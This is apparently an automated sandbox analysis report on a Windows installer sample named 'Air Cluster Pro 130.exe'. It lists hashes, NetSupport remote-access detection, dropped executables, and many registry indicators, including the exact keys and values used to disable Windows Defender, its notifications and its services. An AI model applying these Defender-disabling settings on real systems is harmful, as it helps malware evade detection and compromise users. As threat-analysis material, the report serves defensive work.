Analysis
-
max time kernel
71s -
max time network
153s -
platform
windows10-1703_x64 -
resource
win10-20230703-en -
resource tags
arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system -
submitted
09/07/2023, 23:45
Static task
static1
Behavioral task
behavioral1
Sample
Air Cluster Pro 130.exe
Resource
win10-20230703-en
General
-
Target
Air Cluster Pro 130.exe
-
Size
1.6MB
-
MD5
5befdb53cdb4441bf5e597ec3f94e95e
-
SHA1
1e9b658228de7ef6e73f9db5dffcee9bce362d2d
-
SHA256
47eb4710f7de558af843178388748abd984027eb76cdd1b6ff50fa8257babeed
-
SHA512
ccc75f6b6bf6a147ee2ab4f552a375d741735d3752740d21dc177b0184a401812f807ec307d7591ae5c66430cc582c5073ce56d45b76fdf03b0d76acf795412e
-
SSDEEP
24576:s7FUDowAyrTVE3U5F/X+IAKic6QL3E2vVsjECUAQT45deRV9RI:sBuZrEU69KIy029s4C1eH9S
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" PowerRun64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DllHost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1" svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection SetACL64.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" SetACL64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection PowerRun64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection bsetgaf.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" bsetgaf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" DllHost.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe -
Modifies security service 2 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" reg.exe -
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 64 IoCs
pid Process 4220 Air Cluster Pro 130.tmp 4372 setup.exe 4204 setup.tmp 4192 s0.exe 1036 s0.tmp 2628 wmiprvse.exe 204 s1.exe 3228 SetACL32.exe 5088 svchost.exe 3100 PowerRun.exe 1104 SetACL32.exe 1420 Conhost.exe 3052 reg.exe 2932 SetACL32.exe 2700 reg.exe 3100 PowerRun.exe 2084 reg.exe 1108 Conhost.exe 3144 reg.exe 4816 reg.exe 4268 PowerRun.exe 4400 reg.exe 5064 reg.exe 1864 reg.exe 4552 reg.exe 756 PowerRun.exe 508 Process not Found 4208 reg.exe 4532 reg.exe 5000 Process not Found 1864 reg.exe 1640 PowerRun.exe 4304 PowerRun.exe 5060 reg.exe 4532 bsetgaf.exe 3004 PowerRun.exe 5000 Process not Found 312 reg.exe 5064 reg.exe 1076 SetACL64.exe 4304 PowerRun.exe 3100 PowerRun.exe 1640 PowerRun.exe 312 reg.exe 1980 Conhost.exe 2252 reg.exe 4184 PowerRun.exe 2084 reg.exe 5064 reg.exe 3584 reg.exe 2696 reg.exe 3004 PowerRun.exe 2996 reg.exe 4552 reg.exe 4140 reg.exe 3840 reg.exe 4012 PowerRun.exe 2032 reg.exe 4640 PowerRun.exe 2956 PowerRun.exe 4316 reg.exe 316 powershell.exe 2084 reg.exe 3840 reg.exe -
Loads dropped DLL 13 IoCs
pid Process 4204 setup.tmp 4204 setup.tmp 4204 setup.tmp 1036 s0.tmp 2628 wmiprvse.exe 2628 wmiprvse.exe 2628 wmiprvse.exe 2628 wmiprvse.exe 2628 wmiprvse.exe 2628 wmiprvse.exe 2628 wmiprvse.exe 204 s1.exe 204 s1.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features SetACL64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Signature Updates SetACL64.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\DisableAntiVirus = "1" PowerRun.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 16 IoCs
description ioc Process File created C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-DLQVL.tmp s0.tmp File opened for modification C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\unins000.dat s0.tmp File opened for modification C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\mfcm140.dll s0.tmp File created C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\unins000.dat s0.tmp File opened for modification C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\ODISSDK.dll s0.tmp File opened for modification C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\DMReportSnapshot.dll s0.tmp File created C:\Program Files (x86)\Air Cluster Pro 130.exe\is-KUGKJ.tmp Air Cluster Pro 130.tmp File opened for modification C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\mpnfimp.dll s0.tmp File created C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-E3T9M.tmp s0.tmp File created C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-NCNS5.tmp s0.tmp File created C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-N1EFL.tmp s0.tmp File created C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-8J05F.tmp s0.tmp File created C:\Program Files (x86)\Air Cluster Pro 130.exe\unins000.dat Air Cluster Pro 130.tmp File opened for modification C:\Program Files (x86)\Air Cluster Pro 130.exe\unins000.dat Air Cluster Pro 130.tmp File opened for modification C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\cnpacnoc.dll s0.tmp File created C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-A7BIE.tmp s0.tmp -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 4 IoCs
resource yara_rule behavioral1/files/0x000600000001b070-370.dat nsis_installer_1 behavioral1/files/0x000600000001b070-370.dat nsis_installer_2 behavioral1/files/0x000600000001b070-375.dat nsis_installer_1 behavioral1/files/0x000600000001b070-375.dat nsis_installer_2 -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ Process not Found Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" SetACL64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ Process not Found Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" SetACL64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" Process not Found Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" Process not Found Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" Process not Found Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" SetACL64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Process not Found Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ SetACL64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" Process not Found Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" SetACL64.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 7eb0ee92bfb2d901 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{2EF5A3B7-4AEA-42BC-A7EA-57D099F85AC4} = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\msn.com MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\msn.com MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" 